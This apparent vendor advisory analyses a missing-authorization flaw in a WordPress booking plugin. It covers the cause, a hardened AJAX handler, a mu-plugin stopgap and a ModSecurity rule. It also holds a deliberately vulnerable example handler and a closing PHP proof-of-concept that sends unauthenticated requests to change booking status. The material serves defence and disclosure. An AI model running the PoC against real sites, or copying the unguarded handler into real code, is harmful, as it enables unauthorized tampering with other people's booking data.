Atomic Edge analysis of CVE-2026-57660 (metadata-based):
This vulnerability affects the Booking and Rental Manager for WooCommerce plugin (slug: booking-and-rental-manager-for-woocommerce) versions up to and including 2.7.1. An unauthenticated attacker can perform unauthorized actions due to a missing capability check on a function. The CVSS score is 5.3 (Medium) with a vector of AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N, indicating network-based, low-complexity exploitation with no privileges or user interaction required, resulting in low integrity impact but no confidentiality or availability impact.
Root Cause: The vulnerability stems from a Missing Authorization (CWE-862) in one or more plugin functions, most likely AJAX handlers registered through the wp_ajax_{action} and wp_ajax_nopriv_{action} hooks. The description and CWE indicate that the plugin did not verify the caller's capability (for example, if ( ! current_user_can( 'manage_options' ) ) { wp_send_json_error(); }) before executing a sensitive operation. Since no code diff is available, Atomic Edge analysis infers this from the most common pattern for such vulnerabilities in WordPress plugins, particularly those handling rental bookings, where actions such as approving, editing, or deleting reservations should require administrative, or at minimum authenticated, privileges. Note that a wp_ajax_nopriv_ registration by itself is not the bug; it is how public booking forms reach the server. The bug is a handler reachable that way that performs a privileged state change without checking who is calling.
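The pattern described above, shown as an added before/after illustration rather than code from the Booking and Rental Manager plugin. The action name brm_update_booking_status, the booking_id and status fields, the _brm_status meta key and the manage_woocommerce capability are all assumptions; the real handler name is not disclosed in the CVE metadata.

```php
<?php
// Added illustration of CWE-862 in a WordPress AJAX handler. Hook name, field names,
// meta key and capability are assumed; none of this is the vendor's code.

// --- Before (2.7.1-style): reachable without login, input sanitized, caller never checked ---
function brm_update_booking_status_vulnerable() {
    $booking_id = isset( $_POST['booking_id'] ) ? absint( $_POST['booking_id'] ) : 0;
    $status     = isset( $_POST['status'] ) ? sanitize_key( $_POST['status'] ) : '';

    // Sanitization is not authorization: nobody asked whether this caller may change
    // a booking at all, and the nopriv hook below makes "this caller" anyone on the internet.
    update_post_meta( $booking_id, '_brm_status', $status );
    wp_send_json_success( array( 'booking_id' => $booking_id, 'status' => $status ) );
}
// Registrations for the vulnerable variant, shown for contrast. A real plugin file would
// contain either these two lines or the hardened registration at the bottom, not both:
// add_action( 'wp_ajax_brm_update_booking_status',        'brm_update_booking_status_vulnerable' );
// add_action( 'wp_ajax_nopriv_brm_update_booking_status', 'brm_update_booking_status_vulnerable' );

// --- After: authorization first, CSRF token second, validated transition third ---
function brm_update_booking_status_hardened() {
    // 1. Authorization (the actual fix for CWE-862). Use the narrowest capability that fits;
    //    manage_woocommerce is an assumed choice for "can manage shop orders".
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 2. CSRF defence. check_ajax_referer() calls wp_die() on failure. It does not replace
    //    step 1: a nonce printed into a page is readable by whoever can load that page.
    check_ajax_referer( 'brm_update_booking_status', 'nonce' );

    // 3. Validate the requested state instead of trusting an arbitrary string.
    $allowed    = array( 'pending', 'approved', 'cancelled' );
    $booking_id = isset( $_POST['booking_id'] ) ? absint( $_POST['booking_id'] ) : 0;
    $status     = isset( $_POST['status'] ) ? sanitize_key( $_POST['status'] ) : '';
    if ( ! $booking_id || ! in_array( $status, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'invalid input' ), 400 );
    }

    update_post_meta( $booking_id, '_brm_status', $status );
    wp_send_json_success( array( 'booking_id' => $booking_id, 'status' => $status ) );
}
// A privileged action gets only the logged-in hook. There is no legitimate reason to expose
// a status change on wp_ajax_nopriv_, so anonymous requests now get WordPress's default
// "0" / HTTP 400 response before any plugin code runs.
add_action( 'wp_ajax_brm_update_booking_status', 'brm_update_booking_status_hardened' );
```

The order inside the hardened handler matters for error handling as well as security: the capability check runs before the nonce check so that an anonymous caller receives a clean 403 rather than a nonce failure, and wp_send_json_error() is used instead of a bare return so the client is not left with WordPress's default "0" body.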
Exploitation: An unauthenticated attacker sends a crafted HTTP POST to the WordPress AJAX endpoint (wp-admin/admin-ajax.php, which is reachable without login despite its path) carrying the plugin's action parameter. The exact action name is not disclosed in the CVE metadata; based on the plugin's functionality and common naming conventions it likely follows patterns such as 'booking_and_rental_manager_approve', 'booking_and_rental_manager_delete_booking', or 'booking_and_rental_manager_update_status', but these are guesses and should be confirmed against the plugin's wp_ajax_nopriv_ registrations before use. No session cookie is needed, since the vulnerability is the absence of a capability check. A nonce, even if the handler checks one, is not an authorization control: a nonce rendered into a public booking page is obtainable by any visitor. A typical request is a POST with action=plugin_specific_action plus the parameters the handler expects, such as booking_id and status.
Remediation: The patched version (2.7.2) likely adds a capability check to the vulnerable function. The fix should verify that the current user holds an appropriate capability (for example current_user_can('edit_posts'), or better a plugin-specific capability scoped to booking management) before performing the action, and should reject with wp_send_json_error() rather than a bare return so that the client receives an explicit error. Plugin developers should also verify a nonce (check_ajax_referer() for AJAX handlers, check_admin_referer() for regular admin-page requests) as a secondary, CSRF-focused layer; a nonce on its own does not fix CWE-862. Administrators unable to update immediately can restrict the specific AJAX action at the web server or WAF (blocking admin-ajax.php wholesale breaks front-end functionality of many themes and plugins), or temporarily disable the vulnerable functionality or the plugin until 2.7.2 is installed.
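One way to apply the "temporarily disable the vulnerable functionality" stopgap without editing vendor files is a must-use plugin that rejects the suspect actions before the plugin's own callback runs. This is an added example, not code from Atomic Edge or the plugin vendor; the action names are the same assumptions used throughout this analysis, and manage_woocommerce is an assumed capability.

```php
<?php
/**
 * Plugin Name: CVE-2026-57660 stopgap (mu-plugin)
 *
 * Added example, not vendor code. Place in wp-content/mu-plugins/ until Booking and Rental
 * Manager 2.7.2 is installed, then delete it. The action names below are assumptions; the
 * real handler name is not disclosed in the CVE metadata, so replace them with the names
 * found in the plugin's add_action( 'wp_ajax_nopriv_...' ) calls.
 */

// Actions believed to perform privileged booking changes (assumed names).
const BRM_STOPGAP_ACTIONS = array(
    'booking_and_rental_manager_approve',
    'booking_and_rental_manager_cancel',
    'booking_and_rental_manager_delete_booking',
    'booking_and_rental_manager_update_status',
);

// Capability a caller must hold. manage_woocommerce is an assumption; use the role that
// legitimately manages bookings on this site.
const BRM_STOPGAP_CAP = 'manage_woocommerce';

function brm_stopgap_guard() {
    if ( ! current_user_can( BRM_STOPGAP_CAP ) ) {
        // wp_send_json_error() ends the request via wp_die(), so the vendor callback
        // (registered at the default priority 10) never executes.
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
}

function brm_stopgap_register() {
    foreach ( BRM_STOPGAP_ACTIONS as $action ) {
        // Priority 0 runs ahead of the vendor handler on both hooks. On wp_ajax_nopriv_
        // the current user is always anonymous, so current_user_can() is false and the
        // request is rejected outright; on wp_ajax_ only the capability decides.
        add_action( 'wp_ajax_' . $action,        'brm_stopgap_guard', 0 );
        add_action( 'wp_ajax_nopriv_' . $action, 'brm_stopgap_guard', 0 );
    }
}
brm_stopgap_register();
```

Because mu-plugins load before regular plugins, the guard is in place regardless of when the vendor registers its handler. The guard only helps if the action names are right: before relying on it, grep the plugin directory for wp_ajax_nopriv_ and confirm which actions are actually exposed to anonymous callers.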
Impact: Exploitation allows unauthenticated attackers to perform state-changing actions that should require authorization, such as modifying booking statuses or deleting reservations. The CVSS vector records low integrity impact and no confidentiality or availability impact: the attacker can alter specific records but, on the available metadata, cannot read privileged data or take the site down. In practice that still means booking manipulation (approving, cancelling or deleting reservations) and corruption of rental data, which is a business-level denial of service even though the site itself stays up. No privilege escalation is indicated, but because no authentication is required, any internet client can reach the affected plugin internals, which broadens the attack surface significantly.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-57660 (metadata-based)
# Blocks unauthenticated POSTs to the assumed vulnerable actions of the Booking and Rental Manager plugin.
# Action names are inferred, not confirmed; REQUEST_FILENAME (no query string) is matched with @endsWith
# so subdirectory installs such as /blog/wp-admin/admin-ajax.php are covered.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" "id:202657660,phase:2,deny,status:403,chain,msg:'CVE-2026-57660 - Attempted exploitation via Booking and Rental Manager AJAX action',severity:'CRITICAL',tag:'CVE-2026-57660'"
    SecRule ARGS_POST:action "@pm booking_and_rental_manager_approve booking_and_rental_manager_cancel booking_and_rental_manager_delete_booking booking_and_rental_manager_update_status" "chain"
    SecRule ARGS_POST:booking_id "@rx ^\d+$" "t:none,chain"
    # Only block requests that carry no WordPress login cookie. This is a presence check, so a forged
    # wordpress_logged_in_* cookie bypasses it; the rule is a stopgap, not a substitute for 2.7.2.
    SecRule &REQUEST_COOKIES_NAMES:/^wordpress_logged_in_/ "@eq 0" "t:none"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-57660 - Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment <= 2.7.1 - Missing Authorization
/**
* This PoC demonstrates exploitation of a missing authorization vulnerability in the
* Booking and Rental Manager for WooCommerce plugin (version <= 2.7.1).
* It targets the AJAX handler that lacks a capability check, allowing unauthenticated
* attackers to perform actions such as modifying booking statuses.
*
* Note: The exact AJAX action name is not confirmed from code. We assume common patterns
* based on the plugin's functionality (approve_booking, cancel_booking, update_status).
* This script uses a generic action placeholder; modify $action and $params as needed.
*/
// Configuration
$target_url = 'http://example.com'; // Change to target WordPress site URL
$action = 'booking_and_rental_manager_approve'; // Likely AJAX action - adjust based on plugin
$params = array(
    'booking_id' => 1,
    'status'     => 'approved'
);

// Construct the AJAX endpoint (reachable without login despite the wp-admin path)
$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';

// Build POST data: admin-ajax.php dispatches on the "action" field
$post_data = array_merge(array('action' => $action), $params);

// Initialize cURL. No cookie jar is attached: the request is deliberately unauthenticated.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing; remove in production
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);

// Output results
echo "Target: $ajax_url\n";
echo "Action: $action\n";
echo "HTTP Code: $http_code\n";
if ($error) {
    echo "cURL Error: $error\n";
    exit(1);
}
// admin-ajax.php answers HTTP 400 with body "0" when no handler is hooked for the action,
// so that combination means the guessed action name is wrong, not that the site is patched.
if ($http_code === 400 && trim($response) === '0') {
    echo "No handler registered for this action; adjust \$action.\n";
}
echo "Response:\n$response\n";
?>